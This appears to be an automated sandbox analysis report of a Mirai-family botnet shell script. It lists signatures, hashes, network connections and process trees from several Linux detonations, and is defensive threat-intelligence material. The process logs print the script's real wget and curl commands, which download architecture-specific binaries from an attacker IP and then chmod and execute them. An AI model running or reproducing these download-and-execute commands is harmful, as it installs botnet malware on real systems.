Malware Analysis Report

2025-01-23 14:50

Sample ID 240831-zw5ezsvhkm
Target ohshit.sh
SHA256 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
Tags
mirai lzrd antivm botnet upx rootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb

Threat Level: Known bad

The file ohshit.sh was found to be: Known bad.

Malicious Activity Summary

mirai lzrd antivm botnet upx rootkit

Mirai

Loads a kernel module

Executes dropped EXE

UPX packed file

Modifies Watchdog functionality

Writes file to system bin folder

Enumerates running processes

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

cURL User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-31 21:05

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

debian9-armhf-20240611-en

Max time kernel

60s

Max time network

65s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-7Xnobv WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-7Xnobv WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

/tmp/WTF

MD5 d209dadd662918c0360d992f693a4c88
SHA1 ff29a4cb9d0d2a4ad7e15f7523bdc5d5d681f990
SHA256 f461632cc61eaa9bcf7deb5dba0ca986c5ea65fb366fae6d329cee5458abd07d
SHA512 809bb6cea3b997755c9464d90f6b3e18b2a007c2b55dcb85ef475e72f632f6c0ea435c9fb7567741ff5233204e958d234ca7ec8e69bfdffff1a8c1dab7c55aba

/tmp/WTF

MD5 b07b623c82c30103949e473cb8f1dc5b
SHA1 605c491a89e2d0e15f1e856c4f64592d63f7343b
SHA256 dc6da971003c88fdafa96d46017b5c53bc87cb3f081e0be4d1342865c85bf898
SHA512 23cd691cfae363b1194586f46403d58e1ea609c4655fba1eb295f344bd41b94ebbe15291b229678dcd3b72a8d2bff2dabfa645eb7e7f4b1d828168ed769d17b4

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 4de74a22ebb3b2008d93fdf898611bdb
SHA1 eb8c46d817f3fca933e91e289897789122b73a54
SHA256 728c84285231652ea1b50ed634d83ef0c6e60a78db8ce93a8ae578e21f677f7e
SHA512 2bc0a4d9610ae4f15475a3eae1b85d812cb8c5229e53f09f2e47aaf26c6963eaffae5d57b27271f2bb35979ddf358e53adcebc1df503030e9854214af1a3c944

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

debian9-mipsel-20240611-en

Max time kernel

60s

Max time network

63s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-ccaa101beeae40f1b359d416f45a956a-systemd-timedated.service-NPoiUQ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-ccaa101beeae40f1b359d416f45a956a-systemd-timedated.service-NPoiUQ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp

Files

/tmp/boatnet.x86

MD5 ba2cb5b8715ba94c39e24e75a34d0ea0
SHA1 7182bf3b0e14e5224e741c15174c6e93f00df444
SHA256 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA512 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d

/tmp/WTF

MD5 d209dadd662918c0360d992f693a4c88
SHA1 ff29a4cb9d0d2a4ad7e15f7523bdc5d5d681f990
SHA256 f461632cc61eaa9bcf7deb5dba0ca986c5ea65fb366fae6d329cee5458abd07d
SHA512 809bb6cea3b997755c9464d90f6b3e18b2a007c2b55dcb85ef475e72f632f6c0ea435c9fb7567741ff5233204e958d234ca7ec8e69bfdffff1a8c1dab7c55aba

/tmp/WTF

MD5 b07b623c82c30103949e473cb8f1dc5b
SHA1 605c491a89e2d0e15f1e856c4f64592d63f7343b
SHA256 dc6da971003c88fdafa96d46017b5c53bc87cb3f081e0be4d1342865c85bf898
SHA512 23cd691cfae363b1194586f46403d58e1ea609c4655fba1eb295f344bd41b94ebbe15291b229678dcd3b72a8d2bff2dabfa645eb7e7f4b1d828168ed769d17b4

/tmp/WTF

MD5 f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1 750274b02d5f5b00026a4f55b020f4285c693533
SHA256 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA512 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259

/tmp/WTF

MD5 a8f502a6fb3b7b940e922c951d9e493a
SHA1 fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512 e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338

/tmp/WTF

MD5 664b42890b160712531140f74a6ab47f
SHA1 69e5e14ab80133b263346c98bbbc57560b9887e1
SHA256 1dd24db0f03ba2d6914002eda04248a0561513a47f55852666540bd23c582ef6
SHA512 d35bfda654489c7615e48ceed90b659730e40da09dc67272bbe6064853b8bbe2ccfb301e95d4488262f62741ceebceac43aa98af90f789036527588b0cc531c3

memory/843-1-0x00400000-0x0043bfb4-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-31 21:05

Reported

2024-08-31 21:06

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

59s

Max time network

61s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /sbin/watchdog /tmp/WTF N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/633/status /tmp/WTF N/A
File opened for reading /proc/629/status /tmp/WTF N/A
File opened for reading /proc/90/status /tmp/WTF N/A
File opened for reading /proc/101/status /tmp/WTF N/A
File opened for reading /proc/110/status /tmp/WTF N/A
File opened for reading /proc/1243/status /tmp/WTF N/A
File opened for reading /proc/1601/status /tmp/WTF N/A
File opened for reading /proc/646/status /tmp/WTF N/A
File opened for reading /proc/697/status /tmp/WTF N/A
File opened for reading /proc/94/status /tmp/WTF N/A
File opened for reading /proc/411/status /tmp/WTF N/A
File opened for reading /proc/697/status /tmp/WTF N/A
File opened for reading /proc/209/status /tmp/WTF N/A
File opened for reading /proc/1197/status /tmp/WTF N/A
File opened for reading /proc/987/status /tmp/WTF N/A
File opened for reading /proc/697/status /tmp/WTF N/A
File opened for reading /proc/1642/status /tmp/WTF N/A
File opened for reading /proc/1657/status /tmp/WTF N/A
File opened for reading /proc/405/status /tmp/WTF N/A
File opened for reading /proc/1669/status /tmp/WTF N/A
File opened for reading /proc/12/status /tmp/WTF N/A
File opened for reading /proc/119/status /tmp/WTF N/A
File opened for reading /proc/1451/status /tmp/WTF N/A
File opened for reading /proc/1586/status /tmp/WTF N/A
File opened for reading /proc/86/status /tmp/WTF N/A
File opened for reading /proc/82/status /tmp/WTF N/A
File opened for reading /proc/1077/status /tmp/WTF N/A
File opened for reading /proc/1091/status /tmp/WTF N/A
File opened for reading /proc/1199/status /tmp/WTF N/A
File opened for reading /proc/1586/status /tmp/WTF N/A
File opened for reading /proc/1159/status /tmp/WTF N/A
File opened for reading /proc/1638/status /tmp/WTF N/A
File opened for reading /proc/1091/status /tmp/WTF N/A
File opened for reading /proc/102/status /tmp/WTF N/A
File opened for reading /proc/871/status /tmp/WTF N/A
File opened for reading /proc/1147/status /tmp/WTF N/A
File opened for reading /proc/1077/status /tmp/WTF N/A
File opened for reading /proc/96/status /tmp/WTF N/A
File opened for reading /proc/1056/status /tmp/WTF N/A
File opened for reading /proc/1607/status /tmp/WTF N/A
File opened for reading /proc/1655/status /tmp/WTF N/A
File opened for reading /proc/1665/status /tmp/WTF N/A
File opened for reading /proc/13/status /tmp/WTF N/A
File opened for reading /proc/95/status /tmp/WTF N/A
File opened for reading /proc/1310/status /tmp/WTF N/A
File opened for reading /proc/1666/status /tmp/WTF N/A
File opened for reading /proc/4/status /tmp/WTF N/A
File opened for reading /proc/1647/status /tmp/WTF N/A
File opened for reading /proc/1675/status /tmp/WTF N/A
File opened for reading /proc/1652/status /tmp/WTF N/A
File opened for reading /proc/1662/status /tmp/WTF N/A
File opened for reading /proc/835/status /tmp/WTF N/A
File opened for reading /proc/1188/status /tmp/WTF N/A
File opened for reading /proc/1249/status /tmp/WTF N/A
File opened for reading /proc/98/status /tmp/WTF N/A
File opened for reading /proc/1641/status /tmp/WTF N/A
File opened for reading /proc/1243/status /tmp/WTF N/A
File opened for reading /proc/1635/status /tmp/WTF N/A
File opened for reading /proc/1652/status /tmp/WTF N/A
File opened for reading /proc/609/status /tmp/WTF N/A
File opened for reading /proc/224/status /tmp/WTF N/A
File opened for reading /proc/705/status /tmp/WTF N/A
File opened for reading /proc/1223/status /tmp/WTF N/A
File opened for reading /proc/7/status /tmp/WTF N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]

/usr/bin/cat

[cat boatnet.x86]

/usr/bin/chmod

[chmod +x WTF boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]

/usr/bin/chmod

[chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]

/usr/bin/chmod

[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:80 94.156.71.225 tcp
NL 94.156.71.225:3778 tcp
